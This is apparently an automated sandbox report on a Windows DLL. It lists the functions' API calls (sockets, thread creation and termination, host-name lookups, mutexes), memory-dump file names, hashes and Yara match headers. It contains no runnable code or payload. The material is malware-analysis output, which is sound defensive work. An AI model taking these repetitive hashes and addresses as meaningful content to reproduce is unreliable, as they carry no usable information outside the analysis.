                                                      • Opcode ID: bb442244e72e22da4d7f3cb7c7dc31e939c401801904e2133fa1fff62a849eae
                                                      • Instruction ID: 0c794dbf93a883c59379ebb3549ba63955cc03bc23cb9c033a601534a3face92
                                                      • Opcode Fuzzy Hash: bb442244e72e22da4d7f3cb7c7dc31e939c401801904e2133fa1fff62a849eae
                                                      • Instruction Fuzzy Hash: 7231AFB4901B00DED361EF2A9584787FBE8EFA4390F11491FE4AA96661DBB4B540CF60
                                                      APIs
                                                      • socket.WS2_32(00000002,00000002,00000011), ref: 1001DF7C
                                                      • WSAGetLastError.WS2_32(?,1001E0B2), ref: 1001DF89
                                                      • setsockopt.WS2_32(00000000,0000FFFF,00001005,?,00000004), ref: 1001DFAB
                                                      • setsockopt.WS2_32(?,0000FFFF,00001006,000003E8,00000004), ref: 1001DFBF
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_10000000_control.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: setsockopt$ErrorLastsocket
                                                      • String ID:
                                                      • API String ID: 1825786771-0
                                                      • Opcode ID: 1a59164a0e9f48adf7641a0f3a4528e9988e322c87277efcff72568403c9b408
                                                      • Instruction ID: b2fa6c4f3e2365603d35b98d26ebd87122be398151743637c1c9ce2e762f7076
                                                      • Opcode Fuzzy Hash: 1a59164a0e9f48adf7641a0f3a4528e9988e322c87277efcff72568403c9b408
                                                      • Instruction Fuzzy Hash: 9BF06DB154421ABFF710AB64CC8AF99BB6CDB08765F204325F312960E0DBF09E409621
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_10000000_control.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: _memmove
                                                      • String ID: req$string too long
                                                      • API String ID: 4104443479-3134357765
                                                      • Opcode ID: 0770ad2f473ed246a5382bbde7f0ad539806e4e39fa84f15cf5e637b602ddf2b
                                                      • Instruction ID: f34db192f8e0fa3b1fa1e0aeedf2e1d9bd4896eeb5cd9540ea6668629b64f2b9
                                                      • Opcode Fuzzy Hash: 0770ad2f473ed246a5382bbde7f0ad539806e4e39fa84f15cf5e637b602ddf2b
                                                      • Instruction Fuzzy Hash: E111B231300740ABEB35DEA9D84195BB7EDEF427D0B10892EF956CB249CB71E908C7A0
                                                      APIs
                                                      • __EH_prolog.LIBCMT ref: 1001198D
                                                      • __time64.LIBCMT ref: 100119AE
                                                        • Part of subcall function 10034410: GetSystemTimeAsFileTime.KERNEL32(?,00000007,00000007,?,10007696,00000000,1005ADE8,?), ref: 10034419
                                                        • Part of subcall function 10034410: __aulldiv.LIBCMT ref: 10034439
                                                        • Part of subcall function 10011419: __EH_prolog.LIBCMT ref: 1001141E
                                                        • Part of subcall function 10011C4E: __EH_prolog.LIBCMT ref: 10011C53
                                                        • Part of subcall function 1001BE7E: __EH_prolog.LIBCMT ref: 1001BE83
                                                        • Part of subcall function 1001BE7E: _sprintf.LIBCMT ref: 1001BEF8
                                                        • Part of subcall function 10003925: _memmove.LIBCMT ref: 10003950
                                                        • Part of subcall function 100036AE: _memmove.LIBCMT ref: 10003704
                                                        • Part of subcall function 1001BF99: __EH_prolog.LIBCMT ref: 1001BF9E
                                                        • Part of subcall function 1001B9CF: __EH_prolog.LIBCMT ref: 1001B9D4
                                                        • Part of subcall function 1001B9CF: LocalAlloc.KERNEL32(00000040,?,1005D658,?,00000000,00000000,?,00000000,00000000), ref: 1001BA16
                                                        • Part of subcall function 1001B9CF: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,?,?,00000000,00000000), ref: 1001BA35
                                                        • Part of subcall function 1001B9CF: char_traits.LIBCPMT ref: 1001BA3C
                                                        • Part of subcall function 1001B9CF: LocalFree.KERNEL32(00000000,00000000,00000000,?,000000FF,00000000,?,?,00000000,00000000), ref: 1001BA4C
                                                        • Part of subcall function 1000236C: __EH_prolog.LIBCMT ref: 10002371
                                                        • Part of subcall function 1000236C: _sprintf.LIBCMT ref: 100023F4
                                                      • CreateThread.KERNEL32(00000000,00000000,1000D4AD,?,00000000,00000000), ref: 10011BBE
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_10000000_control.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: H_prolog$LocalTime_memmove_sprintf$AllocByteCharCreateFileFreeMultiSystemThreadWide__aulldiv__time64char_traits
                                                      • String ID:
                                                      • API String ID: 2736727069-0
                                                      • Opcode ID: 2284227b271104c13a36550e6f4ef396fbd15695afdfbb145b2e9933fca94256
                                                      • Instruction ID: 580e3e4189418ba42efff9c301c6a522281fecc5959f66fff071016f5e044300
                                                      • Opcode Fuzzy Hash: 2284227b271104c13a36550e6f4ef396fbd15695afdfbb145b2e9933fca94256
                                                      • Instruction Fuzzy Hash: B2718434900258EEEB14DBA4CD95BEDB7B8EF14340F50459AE40A77186EB706F89CFA1
                                                      APIs
                                                        • Part of subcall function 10025E20: GetNativeSystemInfo.KERNELBASE(?,93656AD3,?,?,?,10050CCE,000000FF,?,1001EB0B,93656AD3), ref: 10025E61
                                                        • Part of subcall function 10025E20: GetNativeSystemInfo.KERNEL32(?,?,?,?,10050CCE,000000FF,?,1001EB0B,93656AD3), ref: 10025E7C
                                                      • GetNativeSystemInfo.KERNEL32(?,93656AD3,0000000F), ref: 1001EB35
                                                      • HeapCreate.KERNELBASE(00000000,00000000,00000000), ref: 1001EBD0
                                                      • _free.LIBCMT ref: 1001EC31
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_10000000_control.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: InfoNativeSystem$CreateHeap_free
                                                      • String ID:
                                                      • API String ID: 3771285432-0
                                                      • Opcode ID: 1e23d421bf4e264bfc0fb7f400e109bcfeb3f31abeb715072edda35998fe9cf1
                                                      • Instruction ID: 084453f00552fd9cdcf573a0b57787ee67f97c677d196269d3afbad7c3934e3d
                                                      • Opcode Fuzzy Hash: 1e23d421bf4e264bfc0fb7f400e109bcfeb3f31abeb715072edda35998fe9cf1
                                                      • Instruction Fuzzy Hash: 7951B4B0814B40DFE761CF25C948787BBE4FB09308F504A1DD8AA8BB90D7B9A548CF85
                                                      APIs
                                                      • WaitForSingleObject.KERNEL32(?,000000FF), ref: 10005734
                                                      • ReleaseMutex.KERNEL32(?,?,?,?,?), ref: 100057EF
                                                      • Sleep.KERNELBASE(00000001), ref: 10005810
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_10000000_control.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: MutexObjectReleaseSingleSleepWait
                                                      • String ID:
                                                      • API String ID: 2685543577-0
                                                      • Opcode ID: df1283a9f5abd3997303220ddb6a8fcc7d2dc6e6c10f47cb207e2c6f176f9dd1
                                                      • Instruction ID: e715972c45bbafa45bd51ed1e775cbe0a086c7abb003f9553e746b27f7d06d24
                                                      • Opcode Fuzzy Hash: df1283a9f5abd3997303220ddb6a8fcc7d2dc6e6c10f47cb207e2c6f176f9dd1
                                                      • Instruction Fuzzy Hash: 2231B535604B41DFEB24DF24C885A5BB7E4FF44391F108A2DE9AE972A5DB31A900CB52
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_10000000_control.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: gethostbynamegethostnameinet_ntoa
                                                      • String ID:
                                                      • API String ID: 289322838-0
                                                      • Opcode ID: 9ebd9e9a71669bdd643d1d02bb31ae1036113e812a7643cec50d709a30c8e0a0
                                                      • Instruction ID: 592dd81a24b4693bc26b9f645d6de9898b1e2dcdf9a12e457dba177d0956e45d
                                                      • Opcode Fuzzy Hash: 9ebd9e9a71669bdd643d1d02bb31ae1036113e812a7643cec50d709a30c8e0a0
                                                      • Instruction Fuzzy Hash: B901A4355001297BEB11DB64CC49EEE73EDEF49360F0441A5F905C7194EBB4EE858A60
                                                      APIs
                                                        • Part of subcall function 1000E186: __EH_prolog.LIBCMT ref: 1000E18B
                                                        • Part of subcall function 1000E186: __time64.LIBCMT ref: 1000E1B1
                                                        • Part of subcall function 1000E186: _rand.LIBCMT ref: 1000E1BE
                                                        • Part of subcall function 1000E186: __time64.LIBCMT ref: 1000E1C7
                                                        • Part of subcall function 1000E186: _sprintf.LIBCMT ref: 1000E228
                                                      • TerminateThread.KERNEL32(?,00000000,75920F10,00000001,?,100060CA,00000000,?), ref: 10007627
                                                      • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,00000030,?,00000000,00000030), ref: 10007630
                                                      • CreateThread.KERNELBASE(00000000,00000000,Function_0001D6D7,?,00000000,00000000), ref: 10007643
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_10000000_control.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Thread__time64$CloseCreateH_prologHandleTerminate_rand_sprintf
                                                      • String ID:
                                                      • API String ID: 1419693727-0
                                                      • Opcode ID: 95d38cc3f9d54e5267e6f74dba200e2d308b9b5cb5c8347e607d3961f31fc1cb
                                                      • Instruction ID: 4a25103f81a40976197cae3d50368f644efecd2bc1ee7d5a155f56b6d39a0099
                                                      • Opcode Fuzzy Hash: 95d38cc3f9d54e5267e6f74dba200e2d308b9b5cb5c8347e607d3961f31fc1cb
                                                      • Instruction Fuzzy Hash: 49F049B1801B94AFF7209F658D88993BBE8FB042D5B04482EE5CB02A11C63AAC04CB60
                                                      APIs
                                                      • TerminateThread.KERNEL32(?,00000000), ref: 1001E0F5
                                                      • CloseHandle.KERNEL32(?), ref: 1001E0FE
                                                      • CreateThread.KERNELBASE(00000000,00000000,Function_0001D145,?,00000000,00000000), ref: 1001E111
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_10000000_control.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Thread$CloseCreateHandleTerminate
                                                      • String ID:
                                                      • API String ID: 214294483-0
                                                      • Opcode ID: 10cf28f626f110404d6837ab319e7110993f05b6c1678dd3a35f428a08d84ec9
                                                      • Instruction ID: 2dd09b30243e208cee3be36777b7a391327da2b40f2e85d95d0c5eab96f726e9
                                                      • Opcode Fuzzy Hash: 10cf28f626f110404d6837ab319e7110993f05b6c1678dd3a35f428a08d84ec9
                                                      • Instruction Fuzzy Hash: 8EF05E75404BD4BEE3629B6A8DC8A57FBDCFB45398F05142DF18286921C6B0FCC68721
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_10000000_control.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: gethostbynamegethostnameinet_ntoa
                                                      • String ID:
                                                      • API String ID: 289322838-0
                                                      • Opcode ID: d03101918194e361efec2291544e3ca20fe63c34b8596ac0bc19394161e466ae
                                                      • Instruction ID: 809eef93411cdc36f9b95217684b62963118020cb64196cb20eb42ce4d12313c
                                                      • Opcode Fuzzy Hash: d03101918194e361efec2291544e3ca20fe63c34b8596ac0bc19394161e466ae
                                                      • Instruction Fuzzy Hash: 2BF05E355001157BD701EB64DC45EEE73ACEF09360F0091A5F911CB1E0DB74EA858BA1
                                                      APIs
                                                      • WaitForSingleObject.KERNEL32(?,000000FF), ref: 100056B1
                                                      • ReleaseMutex.KERNEL32(?), ref: 100056C9
                                                      • Sleep.KERNELBASE(00000001), ref: 100056DA
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_10000000_control.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: MutexObjectReleaseSingleSleepWait
                                                      • String ID:
                                                      • API String ID: 2685543577-0
                                                      • Opcode ID: 593a64ed2e79e59b082791af515e515c7d97c51f707634b9aa15c0136f9fabbc
                                                      • Instruction ID: dded88739cd7db52ccc2d7391d290ba0f31111a6fc9c71b8e083dbddec35d66f
                                                      • Opcode Fuzzy Hash: 593a64ed2e79e59b082791af515e515c7d97c51f707634b9aa15c0136f9fabbc
                                                      • Instruction Fuzzy Hash: 06F082302157109BFB109B358C0D79773D8EB046E2F504A59F86AD31E4DBB6B940CAA8
                                                      APIs
                                                      • WaitForSingleObject.KERNEL32(?,000000FF), ref: 1000D570
                                                      • ReleaseMutex.KERNEL32(?), ref: 1000D588
                                                      • Sleep.KERNELBASE(00000001), ref: 1000D590
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_10000000_control.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: MutexObjectReleaseSingleSleepWait
                                                      • String ID:
                                                      • API String ID: 2685543577-0
                                                      • Opcode ID: 435548193f2fc2d9db74e09c3e0a4e81a4e21e06e2e29fb278ba999a3a509378
                                                      • Instruction ID: 40aa0b88ac9075472564fd970badd49691fce1c548194cc152243a28c8bc4203
                                                      • Opcode Fuzzy Hash: 435548193f2fc2d9db74e09c3e0a4e81a4e21e06e2e29fb278ba999a3a509378
                                                      • Instruction Fuzzy Hash: A4F0A030614E189BEB50AFB48C0969A33E8EB043A6F004705FC66D72D0DF70E800C6A0
                                                      APIs
                                                      • _malloc.LIBCMT ref: 100338A0
                                                        • Part of subcall function 100339BC: __FF_MSGBANNER.LIBCMT ref: 100339D3
                                                        • Part of subcall function 100339BC: __NMSG_WRITE.LIBCMT ref: 100339DA
                                                        • Part of subcall function 100339BC: RtlAllocateHeap.NTDLL(02E60000,00000000,00000001,00000000,?,00000000,?,10039271,00000000,00000000,00000000,?,?,10037A2F,00000018,1005F658), ref: 100339FF
                                                      • std::exception::exception.LIBCMT ref: 100338BC
                                                      • __CxxThrowException@8.LIBCMT ref: 100338D1
                                                        • Part of subcall function 100374AB: RaiseException.KERNEL32(?,?,100324BA,?,?,?,?,?,100324BA,?,1005F454,100065DE), ref: 100374FC
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_10000000_control.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AllocateExceptionException@8HeapRaiseThrow_mallocstd::exception::exception
                                                      • String ID:
                                                      • API String ID: 3074076210-0
                                                      • Opcode ID: ed4abc893698bb5c9891ceb1209db964a45c4fcf2f67754a5fea7d696837269a
                                                      • Instruction ID: c40b9cdaa8620edb58705369e45bb3f43a5e7579885d0b9e5bbbb9385e176104
                                                      • Opcode Fuzzy Hash: ed4abc893698bb5c9891ceb1209db964a45c4fcf2f67754a5fea7d696837269a
                                                      • Instruction Fuzzy Hash: E2E09B7950070AAEDB42EB94DC819EE77BCEF00246F504469F504EE191EF71E648DA61
                                                      APIs
                                                      • TerminateThread.KERNEL32(?,00000000), ref: 1001E13D
                                                      • CloseHandle.KERNEL32(?), ref: 1001E146
                                                      • CreateThread.KERNELBASE(00000000,00000000,1001D388,?,00000000,00000000), ref: 1001E159
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_10000000_control.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Thread$CloseCreateHandleTerminate
                                                      • String ID:
                                                      • API String ID: 214294483-0
                                                      • Opcode ID: e2924c68d2b2267d5823fbb3e087017964b0d5ed592416646ef2ebd214186f35
                                                      • Instruction ID: 6c47360e48e541f40c0052723e9235e3811fbb2456bc37a5d5909ff28a07795f
                                                      • Opcode Fuzzy Hash: e2924c68d2b2267d5823fbb3e087017964b0d5ed592416646ef2ebd214186f35
                                                      • Instruction Fuzzy Hash: 93E06DB1401BA4BEE3609B699DC895BBFDCFB05399F04542DF18241910C6B8BC40CF20
                                                      APIs
                                                      • __EH_prolog.LIBCMT ref: 100058C4
                                                        • Part of subcall function 10033888: _malloc.LIBCMT ref: 100338A0
                                                      • Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception.LIBCPMT ref: 10005A51
                                                        • Part of subcall function 1001EAC0: GetNativeSystemInfo.KERNEL32(?,93656AD3,0000000F), ref: 1001EB35
                                                        • Part of subcall function 1001EAC0: HeapCreate.KERNELBASE(00000000,00000000,00000000), ref: 1001EBD0
                                                        • Part of subcall function 1001EAC0: _free.LIBCMT ref: 1001EC31
                                                        • Part of subcall function 1001E420: HeapCreate.KERNELBASE(?,?,00000000,00000000), ref: 1001E47F
                                                        • Part of subcall function 1001E420: _free.LIBCMT ref: 1001E4DD
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_10000000_control.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CreateHeap_free$Concurrency::details::_Concurrent_queue_base_v4::_H_prologInfoInternal_throw_exceptionNativeSystem_malloc
                                                      • String ID:
                                                      • API String ID: 3164855647-0
                                                      • Opcode ID: 47b4105fe6b3e3161048d5cd8b82993bfb555cfdef2340cd0389ffd279ded10a
